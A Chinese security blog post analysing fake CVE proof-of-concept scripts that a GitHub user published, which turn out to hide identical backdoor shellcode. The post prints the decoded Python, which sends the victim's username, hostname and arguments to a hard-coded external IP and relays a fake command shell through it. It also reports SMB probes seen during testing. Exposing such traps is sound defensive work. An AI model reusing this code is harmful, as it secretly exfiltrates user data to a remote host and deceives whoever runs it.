学习
实践
活动
专区
工具
TVP
写文章
专栏首页Timeline Sec揭露 | 国产老硬币l33terman6000的骚操作

揭露 | 国产老硬币l33terman6000的骚操作

0x01 事件起因

昨天早上9点左右逛github时,我发现l33terman6000一次性放出了最近热门的7个漏洞的poc。

0x02 事件经过

兴奋地尝试CVE-2020-0796之后发现,好像可以啊!

仔细一看我发现7个脚本中shellcode完全一样。

Shellcode解码看看。

得到了如下代码:

time.sleep(3)
lhost = os.uname()[1]
command = getpass.getuser() + '@' + (lhost)
args = ' '.join(sys.argv[1:])
ErrorMsg = 'Connection Terminated: (Timeout)'
URL = http://54.184.20.69/poc2.php
PARAMS = {'host':command, 'args':args, 'cve':Bug}
r = requests.get(url = URL, params = PARAMS)
welcome = r.content
if welcome != "":
        rsp = 1
        while rsp != "":
                cmd = raw_input(welcome)
                PARAMS = {'host':command, 'args':cmd, 'cve':Bug}
                r = requests.get(url = URL, params = PARAMS)
                rsp = r.content
                print rsp
                welcome = "C:\WINDOWS\system32>"
time.sleep(10)

发送参数给54.184.20.69/poc2.php, 做的全是和poc2的交互,相当于poc2.php做了http代理。

敲ipconfig之后返回的IP信息在54.184.20.69/ip.txt,其实都是他设置好的。

经过尝试,发现执行dir,whoami,ipconfig都会返回他设置的信息,如果执行其他命令如:ver,shell就会断开。

我是在本地执行的,由于他的poc无法打到我的内网,导致poc2.php中的”真poc”没有触发。于是我在Ubuntu vps上进行实验监听了445端口,还真来东西了。

抓包看看,120.244.60.215来了一堆SMB2请求包,和Ubuntu协商SMB失败。

之后转发内网win10 445端口到Ubuntu vps的445端口,因为他只会访问445端口,怀疑有真CVE-2020-0796poc,之后开始抓poc。

然后我再用假poc去打公网的SMB服务时,执行ipconfig会返回vps地址,网关都换成117.51.142.1,相当逼真。

然后分析SMB流量。

第一个包:协商SMB版本 第二个包:尝试用户名为.密码为空登录 第三个包:尝试对192.168.0.18\IPC$连接 第四个包:再次协商SMB版本 第五个包:尝试SMB匿名登录尝试 第六个包:尝试对192.168.56.20\IPC$连接 怀疑是等待时间太短,之后尝试等待30分钟,vps445端口大概20分钟没流量之后关闭了连接。

可以看到又新增了二个ip来访问SMB,不过还是相同的六次请求,2次实验,共来四个不同ip进行访问,每次指定两个ip去进行IPC$连接。其中发现一个公网ip,其他都是内网ip。

公网ip 62.234.15.3 并没有开SMB服务。

telnet公网ip之后,越来越和poc没有关系了。。。

0x03 最终结论

1、两次使用poc对比

内网使用poc打的话,会返回他设置的54.184.20.69的信息,和你的win10靶机没有任何关系。 公网使用poc打的话,两次实验,共发现4个ip来对靶机进行SMB访问,全是国内ip,每次尝试对两个地址尝试IPC$连接和匿名登录。

文章分享自微信公众号:
Timeline Sec

本文参与 腾讯云自媒体分享计划 ,欢迎热爱写作的你一起参与!

作者:mai-lang-chai
原始发表时间:2020-04-23
如有侵权,请联系 cloudcommunity@tencent.com 删除。
登录 后参与评论
0 条评论

相关文章

  • “扔瓶子”有套路?日本高中生开发机器人,手残党们有救了

    没想到始于 2016 年的一款扔瓶子游戏,竟到如今还流行在(视频中的)街头巷尾,得到不少年轻人的追捧。

    AI科技大本营
  • 研发管理软件国产化“选型”之关键:迁移成本和可延展性

    从2013年斯诺登揭露的棱镜计划以来,世界各国都在重新审视自身数字化进程中的各种风险,我国自然也不例外,在2014年首届国产软件产业链合作峰会上,提出了有关软件...

    UniPro
  • Java知识点——Stream流

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FQC4twIB-1584855460869)(img/流水线引入Stream思想...

    用户7073689
  • CIA Vault7最新泄露文档:樱花盛开

    多份维基解密于2017年6月15日披露的文件显示,CIA早在2006年便开始了一项名为“樱花盛开”(Cherry Blossom)的项目。曝光的文档资料详实,图...

    FB客服
  • 脸都不要了!直接拷贝人家PPT要融资?首席顾问来头还不小?

    今天DD看到一个很操蛋的事,一定要给大家曝光一下!这样的技术人,应该被唾弃!真是脸都不要了! 就在刚刚,DD看到涛思数据创始人陶建辉在微博上吐槽有人把他们的PP...

    程序猿DD
  • 学会这些(滑动关机、应用多开、QQ微信消息攻击、表白神器),逼格瞬间提升1000倍

    时隔多天,今天又和大家见面了。上期分享的关于计算窗口的一些基本操作,你可以点击《关于Windows窗口的这些骚操作,Are you know?》查看。本期为老铁...

    C you again
  • 小白秒变大神--windows窗口+装B神器大全 两部曲

    在现代生活中,电脑已经普及到方方面面。无论是休闲娱乐,还是上班办公,它都陪在我们身边,成为我们生活中不可分割的一部分。

    C you again 的博客
  • 毕加索把它们「藏」起,AI 又给「挖」了出来

    场景描述:许多艺术作品中,在真实的表象之下,会隐藏一些难以察觉的秘密 。比如在毕加索的一些绘画里,就有被新画覆盖掉的作品。而在 X 光检测和神经风格迁移等技术下...

    HyperAI超神经
  • 大新闻 | 高校开设区块链课程,许家印投资贾跃亭FF,微博清理不再针对同性恋内容,小米5月港股上市,EOS超级节点竞争进入白热化

    新闻热点 1 浙江大学等高校开设区块链课程 (中国青年报)数据表明,区块链人才需求暴涨。2017年11月之后,区块链相关岗位的平均招聘薪资达到2.58万元。今年...

    灯塔大数据
  • 揭露SAP培训机构的套路

    越来越多的人找我控诉去参加SAP培训机构,花了大价钱不说,还浪费了很多时间,最终还找不到工作,非常懊恼。当初SAP培训机构所有的承诺都化为泡影,一个也无法实现。

    SAP梦心
  • Excel如何保持排序的时候图片与单元格一起移动?

    微信小伙伴提问题,排序的表格中带有图片,为什么一排序,图片都乱了,有没有什么好方法能让图片和单元格一起移动?实际上这个问题是一直存在的,尤其是人事的花名册带照片...

    砸漏
  • 我天!xx.equals(null) 是什么骚操作??

    我的天,最近做 Code Review 看到一个同事的骚操作,他写了一个工具类,大概是这样的:

    Java技术栈
  • 鹅厂薪酬改革:晋升不一定调薪,原则上员工可以降薪...

    昨天,深证一公司的降薪骚操作:让员工竞标,降最多的留下的话题在群里(点击加群)被热议。今天下午,关于鹅厂的薪酬改革又被刷屏了! 怎么一回事呢?该话题主要起源于微...

    程序猿DD
  • 信息安全危机 让国产软件厂商联手共商“去SOA”大计

    “去IOE”正如火如荼之际,一个“去SOA”新概念随即应运而生,风起云涌。与此同时,“去SOA”活动也在近期举行,由业内知名人士、国产软件厂商共同参与,“去SO...

    人称T客
  • 请马上卸载这个恶心的软件!!!

    大家都知道,Notepad++ 是 Windows 系统上用的比较多的一款编辑器,之前就频频作妖被广大程序员抵制,不知道哪里来的底气,最近 Notepad++ ...

    Java技术栈

扫码关注腾讯云开发者

领取腾讯云代金券